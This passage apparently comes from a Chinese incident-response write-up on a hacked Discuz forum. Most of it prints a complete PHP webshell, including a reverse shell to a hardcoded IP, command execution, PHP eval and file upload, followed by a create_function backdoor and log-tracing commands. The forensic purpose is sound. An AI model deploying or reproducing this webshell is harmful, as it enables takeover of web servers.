'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg==';
        $file = strdir($dir.'/t00ls.py');
        $key = filew($file,base64_decode($shell),'w');
        if($key) { @chmod($file,0777); command('/usr/bin/python '.$file.' '.$ip.' '.$port,$dir); }
        break;
        case "pcntl" :
        $file = strdir($dir.'/t00ls');
        $key = filew($file,base64_decode($c_bin),'wb');
        if($key) { @chmod($file,0777); if(function_exists('pcntl_exec')) { @pcntl_exec($file,array($ip,$port)); } }
        break;
    }
    if(!$key) { $msg = '<h1>临时目录不可写</h1>'; } else { @unlink($file); $msg = '<h2>CLOSE</h2>'; }
    return $msg;
}
function getinfo() {
    return function_exists('phpinfo');
}
if(isset($_POST['action'])) {
    if($_POST['action'] == 'down') {
        $downfile = $fileb = strdir($_POST["rsv_bp"].'/'.$_POST["wd"]);
        if(!filed($downfile)) { $msg = '<h1>下载文贱不存在</h1>'; }
    }
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "<a href="http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" target="_blank">http://www.w<wbr>3.org/TR/xht<wbr>ml1/DTD/xhtm<wbr>l1-strict.dt<wbr>d</a>">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<style type="text/css">
* {margin:0px;padding:0px;}
body

{background:#000000;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word;
word-break:break-all;}
a{color:#000000;text-decoration:none;vertical-align:middle;}
a:hover{color:#FF0000;text-decoration:underline;}
p {padding:1px;line-height:1.6em;}
h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}
h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}
form {display:inline;}
input,select { vertical-align:middle; }
input[type=text], textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}
input[type=submit], input[type=button] {height:21px;}
.tag {text-align:center;background:threedface;height:25px;padding-top:5px;}
.tag
a
{background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}
.tag a:hover, .tag a.current {background:#CCC333;color:#000000;text-decoration:none;}
.main {width:963px;margin:0 auto;padding:10px;}
.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}
.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}
.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}
.msgbox {padding:5px;background:#CCC333;text-align:center;vertical-align:middle;}
.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}
.tables {width:100%;}
.tables
th {background:threedface;text-align:left;border-color:#FFFFFF #666666
#666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}
.tables td {background:#F9F6F4;height:19px;padding-left:2px;}
</style>
<script type="text/javascript">
function $(ID) { return document.getElementById(ID); }
function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }
function cd(dir) { dir = sd(dir); $('rsv_t').value = dir; $('frm').submit(); }
function
sa(form) { for(var i = 0;i < form.elements.length;i++) { var e =
form.elements; if(e.type == 'checkbox') { if(e.name != 'chkall') {
e.checked = form.chkall.checked; } } } }
function go(a,b) { b =
sd(b); $('action').value = a; $("wd").value = b; if(a == 'editor') {
$('gofrm').target = "_blank"; } else { $('gofrm').target = ""; }
$('gofrm').submit(); }
function nf(a,b) { re = prompt("新建名",b); if(re) { $('action').value = a; $("wd").value = re; $('gofrm').submit(); } }
function
dels(a) { if(a == 'b') { var msg = "所选文贱"; $('act').value = a; } else {
var msg = "目录"; $('act').value = 'deltree'; $('var').value = a; }
if(confirm("确定要删"+msg+"吗")) { $('frm1').submit(); } }
function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }
function
acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) {
$('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }
</script>
<title><?php echo VERSION.' - 【'.date('Y-m-d H:i:s 星期N',time()).'】';?></title>
</head>
<body>
<div class="main">
    <div class="outl">

   <div class="toptag"><?php echo ($_SERVER['SERVER_ADDR'] ?
$_SERVER['SERVER_ADDR'] : gethostbyname($_SERVER['SERVER_NAME'])).' -
'.php_uname().'';?></div>
<?php
$menu = array('file' => '文贱管理','1' => '反谈端口','2' => '执行密令','3' => '执行PHP','4' => '系统信息');
$go = array_key_exists($_POST['action'],$menu) ? $_POST['action'] : 'file';
$nowdir = isset($_POST['rsv_t']) ? strdir(chop($_POST['rsv_t']).'/') : THISDIR;
echo '<div class="tag">';
foreach($menu
as $key => $name) { echo '<a'.($go == $key ? ' class="current"' :
'').'
href="javascript:go(\''.$key.'\',\''.$nowdir.'\');">'.$name.'</a>
'; }
echo '</div>';

echo '<form name="gofrm" id="gofrm" method="POST">';;
echo '<input type="hidden" name="action" id="action" value="">';
echo '<input type="hidden" name="rsv_bp" id="rsv_bp" value="'.$nowdir.'">';
echo '<input type="hidden" name="wd" id="wd" value="">';
echo '</form>';
switch($_POST['action']) {
case "4" :
if(EXISTS_PHPINFO) {
    ob_start();
    phpinfo(INFO_GENERAL);
    $out = ob_get_contents();
    ob_end_clean();
    $tmp = array();

   preg_match_all('/\<td
class\=\"e\"\>.*?(Command|Configuration)+.*?\<\/td\>\<td
class\=\"v\"\>(.*?)\<\/td\>/i',$out,$tmp);
    $config = $tmp[2][0];
    $phpini = $tmp[2][2] ? $tmp[2][1].' --- '.$tmp[2][2] : $tmp[2][1];
}
$infos = array(
    '限制目录' => ini_get('open_basedir'),
    '系统版本' => php_uname(),
    '系统环境' => $_SERVER['SERVER_SOFTWARE'],
    '被禁用的函数' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '(无)',
    '被禁用的类' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '(无)',
    'PHP.ini配置路径' => $phpini ? $phpini : '(无)',
    'PHP运行方式' => php_sapi_name(),
    'PHP版本' => PHP_VERSION,
    'PHP进程PID' => getmypid(),
    'Web服务端口' => $_SERVER['SERVER_PORT'],
    'Web根目录' => $_SERVER['DOCUMENT_ROOT'],
    'Web执行脚本' => $_SERVER['SCRIPT_FILENAME'],
    'Web规范CGI版本' => $_SERVER['GATEWAY_INTERFACE'],
    'Web管理员Email' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '(无)',
    '当前磁盘总大小' => size(disk_total_space('.')),
    '当前磁盘可用空间' => size(disk_free_space('.')),
    '是否支持Pcntl' => function_exists('pcntl_exec') ? '是' : '否',
    '是否运行于安全模式' => get_cfg_var("safemode") ? '是' : '否',
    '是否允许动态加载链接库' => get_cfg_var("enable_dl") ? '是' : '否',
    '是否显示错误信息' => get_cfg_var("display_errors") ? '是' : '否',
    '是否自动注册全局变量' => get_cfg_var("register_globals") ? '是' : '否',
    '是否使用反斜线引用字符串' => get_cfg_var("magic_quotes_gpc") ? '是' : '否',
    'PHP编译参数' => $config ? $config : '(无)'
);
echo '<div class="msgbox">'.$msg.'</div>';
echo '<table class="tables"><tr><th style="width:26%;">名称</th><th>参数</th></tr>';
foreach($infos as $name => $var) { echo '<tr><td>'.$name.'</td><td>'.$var.'</td></tr>'; }
echo '</table>';
break;
case "2" :
$cmd = $win ? 'dir' : 'ls -al';
$res = array('res' => '命令回显','msg' => $msg);
$str = isset($_POST['str']) ? $_POST['str'] : 'fun';
if(isset($_POST['rsv_pq'])) {
    $cmd = $_POST['rsv_pq'];
    $cwd = $str == 'fun' ? THISDIR : 'com';
    $res = command($cmd,$cwd);
}
echo '<div class="msgbox">'.$res['msg'].'</div>';
echo '<form method="POST">';;
echo '<input type="hidden" name="action" id="action" value="2">';
echo
'<div class="actall">命令 <input type="text" name="rsv_pq"
id="rsv_pq" value="'.htmlspecialchars($cmd).'" style="width:398px;">
';
echo '<select name="str">';
$selects = array('fun' => 'phpfun','com' => 'wscript');
foreach($selects
as $var => $name) { echo '<option value="'.$var.'"'.($var == $str
? ' selected' : '').'>'.$name.'</option>'; }
echo '</select> ';
echo '<input type="submit" style="width:50px;" value="执行">';
echo
'</div><div class="actall"><textarea
style="width:698px;height:368px;">'.htmlspecialchars($res['res']).'</textarea></div></form>';
break;
case "3" :
if(isset($_POST['phpcode'])) {
    $phpcode = chop($_POST['phpcode']);
    ob_start();
    if(substr($phpcode,0,2) == '<?' && substr($phpcode,-2) == '?>') { @eval ('?>'.$phpcode.'<?php '); }
    else { @eval ($phpcode); }
    $out = ob_get_contents();
    ob_end_clean();
} else {
    $phpcode = 'phpinfo();';
    $out = '回显窗口';
}
echo

base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2JqbmFtZSkge3ZhciB3aW5uYW1lID0gd2luZG93Lm9wZW4oJycsIl9ibGFuayIsJycpO3ZhciBvYmogPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChvYmpuYW1lKTt3aW5uYW1lLmRvY3VtZW50Lm9wZW4oJ3RleHQvaHRtbCcsJ3JlcGxhY2UnKTt3aW5uYW1lLm9wZW5lciA9IG51bGw7d2lubmFtZS5kb2N1bWVudC53cml0ZShvYmoudmFsdWUpO3dpbm5hbWUuZG9jdW1lbnQuY2xvc2UoKTt9PC9zY3JpcHQ+');
echo '<div class="msgbox">'.$msg.'</div>';
echo '<form method="POST">';
echo '<input type="hidden" name="action" id="action" value="3">';
echo
'<div class="actall"><p><textarea name="phpcode"
id="phpcode"
style="width:698px;height:180px;">'.htmlspecialchars($phpcode).'</textarea></p><p>';
echo '<input type="submit" style="width:80px;" value="执行"></p></div>';
echo
'</form><div class="actall"><p><textarea
id="evalcode"
style="width:698px;height:180px;">'.htmlspecialchars($out).'</textarea></p><p><input
type="button" value="以HTML运行以上代码"
onclick="runcode(\'evalcode\')"></p></div>';
break;
case "1" :
if((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {
    $backip = $_POST['backip'];
    $backport = $_POST['backport'];
    $temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';
    $type = $_POST['type'];
    $msg = backshell($backip,$backport,$temp,$type);
} else {
    $backip = '222.73.219.91';
    $backport = '443';
    $temp = '/tmp';
    $type = 'pl';
}
echo '<div class="msgbox">'.$msg.'</div>';
echo '<form method="POST">';
echo '<input type="hidden" name="action" id="action" value="1">';
echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';
echo
'<tr><td>反谈地址</td><td><input type="text"
name="backip" style="width:268px;" value="'.$backip.'"> (Your
ip)</td></tr>';
echo
'<tr><td>反谈端口</td><td><input type="text"
name="backport" style="width:268px;" value="'.$backport.'"> (nc -vvlp
'.$backport.')</td></tr>';
echo
'<tr><td>临时目录</td><td><input type="text"
name="temp" style="width:268px;" value="'.$temp.'"> (Only
Linux)</td></tr>';
echo '<tr><td>反谈方法</td><td>';
$types = array('pl' => 'Perl','py' => 'Python','pcntl' => 'Pcntl','php' => 'PHP','phpwin' => 'PHP-WS');
foreach($types
as $key => $name) { echo '<label><input type="radio"
name="type" value="'.$key.'"'.($key == $type ? ' checked' :
'').'>'.$name.'</label> '; }
echo
'</td></tr><tr><td>操作</td><td><input
type="submit" style="width:80px;"
value="反谈"></td></tr>';
echo '</table></form>';
break;
case "edit" : case "editor" :
$file = strdir($_POST["rsv_bp"].'/'.$_POST["wd"]);
$iconv = function_exists('iconv');
if(!file_exists($file)) {
    $msg = '【新建文贱】';
} else {
    $code = filer($file);
    $chst = '默认';
    $size = size(filesize($file));
    $msg = '【文贱属性 '.substr(decoct(fileperms($file)),-4).'】 【文贱大小 '.$size.'】 【文贱编码 '.$chst.'】';
}
echo
'<div class="msgbox"><input name="keyword" id="keyword"
type="text" style="width:138px;height:15px;"> -
'.$msg.'</div>';
echo '<form name="editfrm" id="editfrm" method="POST">';
echo '<input type="hidden" name="action" value=""><input type="hidden" name="act" id="act" value="edit">';
echo '<input type="hidden" name="rsv_t" id="rsv_t" value="'.dirname($file).'">';
echo '<div class="actall">文贱 <input type="text" name="filename" value="'.$file.'" style="width:528px;"> ';
echo
'</div><div class="actall"><textarea name="filecode"
id="filecode"
style="width:698px;height:358px;">'.htmlspecialchars($code).'</textarea></div></form>';
echo
'<div class="actall"
style="padding:5px;padding-right:68px;"><input type="button"
onclick="$(\'editfrm\').submit();" value="保存" style="width:80px;"> ';
echo
'<form name="backfrm" id="backfrm" method="POST"><input
type="hidden" name="action" value=""><input type="hidden"
name="rsv_t" id="rsv_t" value="'.dirname($file).'">';
echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
break;
case "upfiles" :
$updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST["rsv_bp"];
$msg = '【最大上船文贱 '.get_cfg_var("upload_max_filesize").'】 【POST最大提交数据 '.get_cfg_var("post_max_size").'】';
$max = 10;
if(isset($_FILES['uploads']) && isset($_POST['renames'])) {
    $uploads = $_FILES['uploads'];
    $msgs = array();
    for($i = 1;$i < $max;$i++) {
        if($uploads['error'][$i] == UPLOAD_ERR_OK) {
            $rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];
            $filea = $uploads['tmp_name'][$i];
            $fileb = strdir($updir.'/'.$rename);

           $msgs[$i] = fileu($filea,$fileb) ? '<br><h2>上船成功
'.$rename.'</h2>' : '<br><h1>上船失败
'.$rename.'</h1>';
        }
    }
}
echo '<div class="msgbox">'.$msg.'</div>';
echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';
echo '<input type="hidden" name="action" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';
echo
'<div class="actall"><p>上船到目录 <input type="text"
name="updir" style="width:398px;" value="'.$updir.'"></p>';
for($i
= 1;$i < $max;$i++) { echo '<p>附贱'.$i.' <input type="file"
name="uploads['.$i.']" style="width:300px;"> 重命名 <input
type="text" name="renames['.$i.']" style="width:128px;">
'.$msgs[$i].'</p>'; }
echo '</div></form><div
class="actall" style="padding:8px;padding-right:68px;"><input
type="button" onclick="$(\'upsfrm\').submit();" value="上船"
style="width:80px;"> ';
echo '<form name="backfrm" id="backfrm"
method="POST"><input type="hidden" name="action"
value=""><input type="hidden" name="rsv_t" id="rsv_t"
value="'.$updir.'">';
echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
break;

default :

if(isset($_FILES['upfile'])) {
    if($_FILES['upfile']['name'] == '') { $msg = '<h1>请选择文贱</h1>'; }

   else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] :
$_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb =
strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ?
'<h2>上船文贱'.$rename.'成功</h2>' :
'<h1>上船文贱'.$rename.'失败</h1>'; }
}

if(isset($_POST['act'])) {
    switch($_POST['act']) {
        case "a" :
            if(!$_POST['files']) { $msg = '<h1>请选择文贱 '.$_POST['var'].'</h1>'; }

           else { $i = 0; foreach($_POST['files'] as $filename) { $i +=
@copy(strdir($nowdir.$filename),strdir($_POST['var'].'/'.$filename)) ? 1
: 0; } $msg =  $msg = $i ? '<h2>共复制 '.$i.'
个文贱到'.$_POST['var'].'成功</h2>' : '<h1>共复制 '.$i.'
个文贱到'.$_POST['var'].'失败</h1>'; }
        break;
        case "b" :
            if(!$_POST['files']) { $msg = '<h1>请选择文贱</h1>'; }

           else { $i = 0; foreach($_POST['files'] as $filename) { $i +=
@unlink(strdir($nowdir.$filename)) ? 1 : 0; } $msg = $i ? '<h2>共删
'.$i.' 个文贱成功</h2>' : '<h1>共删 '.$i.' 个文贱失败</h1>'; }
        break;
        case "c" :
            if(!$_POST['files']) { $msg = '<h1>请选择文贱 '.$_POST['var'].'</h1>'; }
            elseif(!ereg("^[0-7]{4}[        DISCUZ_CODE_5        ]quot;,$_POST['var'])) { $msg = '<h1>属性值错误</h1>'; }

           else { $i = 0; foreach($_POST['files'] as $filename) { $i +=
@chmod(strdir($nowdir.$filename),base_convert($_POST['var'],8,10)) ? 1 :
0; } $msg = $i ? '<h2>共 '.$i.'
个文贱修改属性为'.$_POST['var'].'成功</h2>' : '<h1>共 '.$i.'
个文贱修改属性为'.$_POST['var'].'失败</h1>'; }
        break;
        case "d" :
            if(!$_POST['files']) { $msg = '<h1>请选择文贱 '.$_POST['var'].'</h1>'; }

           elseif(!preg_match('/(\d+)-(\d+)-(\d+)
(\d+):(\d+):(\d+)/',$_POST['var'])) { $msg = '<h1>时间格式错误
'.$_POST['var'].'</h1>'; }
            else { $i = 0;
foreach($_POST['files'] as $filename) { $i +=
@touch(strdir($nowdir.$filename),strtotime($_POST['var'])) ? 1 : 0; }
$msg = $i ? '<h2>共 '.$i.' 个文贱修改时间为'.$_POST['var'].'成功</h2>' :
'<h1>共 '.$i.' 个文贱修改时间为'.$_POST['var'].'失败</h1>'; }
        break;
        case "e" :
            $path = strdir($nowdir.$_POST['var'].'/');
            if(file_exists($path)) { $msg = '<h1>目录已存在 '.$_POST['var'].'</h1>'; }

           else { $msg = @mkdir($path,0777) ? '<h2>创建目录
'.$_POST['var'].' 成功</h2>' : '<h1>创建目录 '.$_POST['var'].'
失败</h1>'; }
        break;
        case "f" :
            $context = array('http' => array('timeout' => 30));
            if(function_exists('stream_context_create')) { $stream = stream_context_create($context); }
            $data = @file_get_contents ($_POST['var'],false,$stream);
            $filename = array_pop(explode('/',$_POST['var']));

           if($data) { $msg =
filew(strdir($nowdir.$filename),$data,'wb') ? '<h2>下载
'.$filename.' 成功</h2>' : '<h1>下载 '.$filename.'
失败</h1>'; } else { $msg = '<h1>下载失败或不支持下载</h1>'; }
        break;
        case "rf" :
            $files = explode('|x|',$_POST['var']);
            if(count($files) != 2) { $msg = '<h1>输入错误</h1>'; }

           else { $msg =
@rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ?
'<h2>重命名 '.$files[1].' 为 '.$files[0].' 成功</h2>' :
'<h1>重命名 '.$files[1].' 为 '.$files[0].' 失败</h1>'; }
        break;
        case "pd" :
            $files = explode('|x|',$_POST['var']);
            if(count($files) != 2) { $msg = '<h1>输入错误</h1>'; }

           else { $path = strdir($nowdir.$files[1]); $msg =
@chmod($path,base_convert($files[0],8,10)) ?
'<h2>修改'.$files[1].'属性为'.$files[0].'成功</h2>' :
'<h1>修改'.$files[1].'属性为'.$files[0].'失败</h1>'; }
        break;
        case "edit" :

           if(isset($_POST['filename']) &&
isset($_POST['filecode'])) { if($_POST['tostr'] == 'utf') {
$_POST['filecode'] =
@iconv('GB2312//IGNORE','UTF-8',$_POST['filecode']); } $msg =
filew($_POST['filename'],$_POST['filecode'],'w') ? '<h2>保存成功
'.$_POST['filename'].'</h2>' : '<h1>保存失败
'.$_POST['filename'].'</h1>'; }
        break;
        case "deltree" :
            $deldir = strdir($nowdir.$_POST['var'].'/');
            if(!file_exists($deldir)) { $msg = '<h1>目录 '.$_POST['var'].' 不存在</h1>'; }

           else { $msg = deltree($deldir) ? '<h2>删目录
'.$_POST['var'].' 成功</h2>' : '<h1>删目录 '.$_POST['var'].'
失败</h1>'; }
        break;
    }
}
$chmod = substr(decoct(fileperms($nowdir)),-4);
if(!$chmod) { $msg .= ' - <h1>无法读取目录</h1>'; }
$array = showdir($nowdir);
$thisurl = strdir('/'.strtr($nowdir,array(ROOTDIR => '')).'/');
$nowdir = strtr($nowdir,array('\'' => '%27','"' => '%22'));
echo '<div class="msgbox">'.$msg.'</div>';
echo '<div class="actall"><form name="frm" id="frm" method="POST">';
echo
(is_writable($nowdir) ? '<h2>路径</h2>' :
'<h1>路径</h1>').' <input type="text" name="rsv_t"
id="rsv_t" style="width:508px;" value="'.strdir($nowdir.'/').'"> ';
echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value="转到"> ';
echo '<input type="button" onclick="cd(\''.ROOTDIR.'\');" style="width:68px;" value="根目录"> ';
echo '<input type="button" onclick="cd(\''.THISDIR.'\');" style="width:68px;" value="程序目录"> ';
echo '</form></div><div class="actall">';
echo '<input type="button" value="贱立文贱" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> ';
echo '<input type="button" value="贱立目录" onclick="txts(\'目录名\',\'newdir\',\'e\');" style="width:68px;"> ';
echo '<input type="button" value="下栽文贱" onclick="txts(\'下载文贱到当前目录\',\'<a href="http://www.baidu.com/cmd.exe/" target="_blank">http://www.b<wbr>aidu.com/cmd<wbr>.exe\</a>',\'f\');" style="width:68px;"> ';
echo '<input type="button" value="批量上船" onclick="go(\'upfiles\',\''.$nowdir.'\');" style="width:68px;"> ';
echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';
echo '<input type="hidden" name="rsv_t" id="rsv_t" value="'.$nowdir.'">';
echo '<input type="file" name="upfile" style="width:286px;height:21px;"> ';
echo '<input type="button" onclick="$(\'upfrm\').submit();" value="上船" style="width:50px;"> ';
echo '上船重命名为 <input type="text" name="rename" style="width:128px;">';
echo '</form></div>';
echo '<form name="frm1" id="frm1" method="POST"><table class="tables">';
echo '<input type="hidden" name="rsv_t" id="rsv_t" value="'.$nowdir.'">';
echo '<input type="hidden" name="act" id="act" value="">';
echo '<input type="hidden" name="var" id="var" value="">';
echo
'<th><a
href="javascript:cd(\''.dirname($nowdir).'/\');">上级目录</a></th><th
style="width:8%">操作</th><th
style="width:5%">属性</th><th
style="width:17%">创建时间</th><th
style="width:17%">修改时间</th><th
style="width:8%">下载</th>';
if($array) {
    asort($array['dir']);
    asort($array['file']);
    $dnum = $fnum = 0;
    foreach($array['dir'] as $path => $name) {
        $prem = substr(decoct(fileperms($path)),-4);
        $ctime = date('Y-m-d H:i:s',filectime($path));
        $mtime = date('Y-m-d H:i:s',filemtime($path));
        echo '<tr>';

       echo '<td><a
href="javascript:cd(\''.$nowdir.$name.'\');"><b>'.strtr($name,array('%27'
=> '\'','%22' => '"')).'</b></a></td>';
        echo '<td><a href="javascript:dels(\''.$name.'\');">删</a> ';
        echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');">重命名</a></td>';
        echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';
        echo '<td>'.$ctime.'</td>';
        echo '<td>'.$mtime.'</td>';
        echo '<td>-</td>';
        echo '</tr>';
        $dnum++;
    }
    foreach($array['file'] as $path => $name) {
        $prem = substr(decoct(fileperms($path)),-4);
        $ctime = date('Y-m-d H:i:s',filectime($path));
        $mtime = date('Y-m-d H:i:s',filemtime($path));
        $size = size(filesize($path));
        echo '<tr>';

       echo '<td><input type="checkbox" name="files[]"
value="'.$name.'"><a target="_blank"
href="'.$thisurl.$name.'">'.strtr($name,array('%27' => '\'','%22'
=> '"')).'</a></td>';
        echo '<td><a href="javascript:go(\'edit\',\''.$name.'\');">编辑</a> ';
        echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');">重命名</a></td>';
        echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';
        echo '<td>'.$ctime.'</td>';
        echo '<td>'.$mtime.'</td>';
        echo '<td align="right"><a href="javascript:go(\'down\',\''.$name.'\');">'.$size.'</a></td>';
        echo '</tr>';
        $fnum++;
    }
}
unset($array);
echo '</table>';
echo '<div class="actall" style="text-align:left;">';
echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';
echo '<input type="button" value="复制" style="width:50px;" onclick=\'txts("复制路径","'.$nowdir.'","a");\'> ';
echo '<input type="button" value="删" style="width:50px;" onclick=\'dels("b");\'> ';
echo '<input type="button" value="属性" style="width:50px;" onclick=\'txts("属性值","0666","c");\'> ';
echo '<input type="button" value="时间" style="width:50px;" onclick=\'txts("修改时间","'.$mtime.'","d");\'> ';
echo '目录['.$dnum.'] - 文贱['.$fnum.'] - 属性['.$chmod.']</div></form>';
break;
}
```


见源码中第5-8行,
```
if(md5($_SERVER['HTTP_USER_AGENT']."KT1ypIeARt")
!== 'e87a2b5341a27ccdeaafcc167d5f0f2f' ||
md5($_SERVER['HTTP_3CEJNPXWAXN']."KT1ypIeARt")
!=='9c2bc4cba0afbead32963d742bf5e665'){
    header("HTTP/1.1 404 Not Found");
    echo 'No input file specified.';exit();
}
```


认证方法较特别,采用HTTP_USER_AGENT 和 HTTP_3CEJNPXWAXN ,md5加了随机salt,故无法解密,直接注释掉进入网页,shell中关键词都进行了故意谐音的处理,如
> 文贱管理 反谈端口 执行密令 执行PHP 系统信息

不得不佩服作者脑洞。文件2解密套路也和文件1差不多,这里不再赘述。

- ## 0x04 清除后门


  第一件事情是清除后门,防止还有其他的后门木马文件存留。我于两月前写的使用一个简单的文件完整校验,把所有网站文件计算一次hash值保存,然后再执行和上次的hash值进行对比,输出新创建的 修改过 及删除的文件列表,源码在这里:https://github.com/xuerhuo/PhpFileMonitoring
果不其然发现一个奇怪文件:
> /www/web/xxx/public_html/uc_server/data/avatar/000/02/01/03_avatar_etc.php

```
<?ph
@$args = 1;
@$arr=array("n;}$_POST[long_key];/*"=>"test");
@$arr1=array_flip($arr);
@$arr2 = $arr1[test];
@create_function('$args',$arr2);

```


??? 一脸懵逼 难道出上传0day了??? 果断删掉

- ## 0x05 溯源&补漏
   
    首先把所有php访问日志过滤出来,因为日志文件实在太大了
```bash
cat <a href="https://exmail.qq.com/cgi-bin/www.xxx.com3.log" target="_blank">www.xxx.com3<wbr>.log</a> |grep 'php'>>attack1803/xxx1803php.log
```

通过三个文件名称查找访问记录
```bash
cat xxx1803php.log | grep -E 'uc_server/data/avatar/000/<span style="border-bottom:1px dashed #ccc;">02/01</span>/03_avatar_etc.php|source/plugin/dzapp_hd/module/hd_seyu.php|template/strong_say/touch/common/tools_ajax.php'
```
> 59.188.72.179 - - [02/Feb/2018:13:12:27 +0800] "GET /source/plugin/dzapp_hd/module/hd_seyu.php HTTP/1.1" 404 55 "<a href="http://www.xxx.com/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/asczxc.php" target="_blank">http://www.x<wbr>xx.com/xxxxx<wbr>x/manage/ass<wbr>ets/lib/webu<wbr>ploader/0.1.<wbr>5/server/asc<wbr>zxc.php</a>" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
59.188.72.179 - - [02/Feb/2018:13:19:16 +0800] "GET /template/strong_say/touch/common/tools_ajax.php HTTP/1.1" 404 55 "<a href="http://www.xxx.com/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/asczxc.php" target="_blank">http://www.x<wbr>xx.com/xxxxx<wbr>x/manage/ass<wbr>ets/lib/webu<wbr>ploader/0.1.<wbr>5/server/asc<wbr>zxc.php</a>" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
59.188.72.179 - - [02/Feb/2018:13:46:23 +0800] "GET /uc_server/data/avatar/000/<span style="border-bottom:1px dashed #ccc;">02/01</span>/03_avatar_etc.php HTTP/1.1" 200 31 "<a href="http://www.xxx.com/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/asczxc.php" target="_blank">http://www.x<wbr>xx.com/xxxxx<wbr>x/manage/ass<wbr>ets/lib/webu<wbr>ploader/0.1.<wbr>5/server/asc<wbr>zxc.php</a>" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
59.188.72.179 - - [02/Feb/2018:13:49:18 +0800] "GET /uc_server/data/avatar/000/<span style="border-bottom:1px dashed #ccc;">02/01</span>/03_avatar_etc.php HTTP/1.1" 200 31 "<a href="http://www.xxx.com/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/asczxc.php" target="_blank">http://www.x<wbr>xx.com/xxxxx<wbr>x/manage/ass<wbr>ets/lib/webu<wbr>ploader/0.1.<wbr>5/server/asc<wbr>zxc.php</a>" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"

然后根据ip查找访问记录
```bash
cat xxx51803php.log |grep '59.188.72.179'
```

>
59.188.72.179 - - [02/Feb/2018:12:59:19 +0800] "GET /portal.php
HTTP/1.1" 200 20531 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100
Safari/537.36"
59.188.72.179 - - [02/Feb/2018:13:01:44 +0800] "POST
/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/preview.php HTTP/1.1"
200 165 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100
Safari/537.36"
